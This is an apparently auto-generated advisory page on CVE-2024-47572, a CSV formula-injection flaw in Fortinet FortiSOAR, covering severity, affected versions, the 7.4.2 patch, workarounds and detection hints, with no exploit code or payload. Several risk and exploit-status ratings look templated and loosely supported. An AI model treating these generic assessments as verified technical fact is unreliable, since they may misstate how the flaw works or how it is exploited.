CVE-2024-47572 – This vulnerability allows attackers to execute ... (How to Fix)

Q: What is the severity of CVE-2024-47572?

CVE-2024-47572 has a CVSS score of 9.0 (CRITICAL). This vulnerability allows attackers to execute arbitrary code on Fortinet FortiSOAR systems by manipulating CSV files. Attackers can craft malicious CSV files containing formula elements that aren't properly neutralized, leading to command execution. Organizations running FortiSOAR versions 7.2.1 through 7.4.1 are affected.

📋 TL;DR

This vulnerability allows attackers to execute arbitrary code on Fortinet FortiSOAR systems by manipulating CSV files. Attackers can craft malicious CSV files containing formula elements that aren't properly neutralized, leading to command execution. Organizations running FortiSOAR versions 7.2.1 through 7.4.1 are affected.

💻 Affected Systems

Products:

Fortinet FortiSOAR

Versions: 7.2.1 through 7.4.1

Operating Systems: All supported platforms

Default Config Vulnerable: ⚠️ Yes

Notes: All deployments with CSV import functionality enabled are vulnerable. The vulnerability exists in the CSV parsing mechanism.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining complete control over the FortiSOAR instance, potentially accessing sensitive security data and using the platform as a foothold into the network.

🟠

Likely Case

Unauthorized command execution leading to data exfiltration, lateral movement, or deployment of malware within the security operations environment.

🟢

If Mitigated

Limited impact due to network segmentation, strict file upload controls, and proper user access restrictions preventing malicious CSV uploads.

🌐 Internet-Facing: HIGH - FortiSOAR instances exposed to the internet are directly vulnerable to CSV file upload attacks.

🏢 Internal Only: MEDIUM - Internal users with access to upload CSV files could exploit this, but requires some level of access.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires ability to upload CSV files to the FortiSOAR system, which typically requires some level of access. The vulnerability is in formula element processing, making exploitation relatively straightforward once access is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.4.2 and later

Vendor Advisory: https://fortiguard.fortinet.com/psirt/FG-IR-24-210

Restart Required: Yes

Instructions:

1. Backup FortiSOAR configuration and data. 2. Download FortiSOAR version 7.4.2 or later from Fortinet support portal. 3. Follow Fortinet's upgrade documentation for your deployment type (appliance/virtual). 4. Apply the update and restart services. 5. Verify functionality post-upgrade.

🔧 Temporary Workarounds

Restrict CSV File Uploads

all

Temporarily disable or restrict CSV file upload functionality in FortiSOAR until patching can be completed.

Implement File Upload Validation

all

Add external validation layer to scan and sanitize CSV files before they reach FortiSOAR.

🧯 If You Can't Patch

Implement strict network segmentation to isolate FortiSOAR from critical systems
Enforce least privilege access controls and audit all CSV file upload activities

🔍 How to Verify

Check if Vulnerable:

Check FortiSOAR version via web interface (Admin > System > About) or CLI command 'csadm --version'

Check Version:

csadm --version

Verify Fix Applied:

Verify version is 7.4.2 or later and test CSV import functionality with safe test files

📡 Detection & Monitoring

Log Indicators:

Unusual CSV file uploads
Unexpected command execution in FortiSOAR logs
Failed CSV import attempts with suspicious content

Network Indicators:

Unusual outbound connections from FortiSOAR system
Data exfiltration patterns

SIEM Query:

source="fortisoar" AND (csv_upload OR file_import) AND (error OR suspicious OR formula)

📊 Metadata

CVE ID: CVE-2024-47572

CVSS v3 Score: 9.0 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-1236

EPSS Score: 0.21% exploit probability (43.2th percentile)

Published: January 14, 2025

Last Updated: July 16, 2025

🔗 References

https://fortiguard.fortinet.com/psirt/FG-IR-24-210 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-47572, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Fortisoar by Fortinet

Fortisoar by Fortinet

Fortisoar by Fortinet

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Restrict CSV File Uploads

Implement File Upload Validation

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities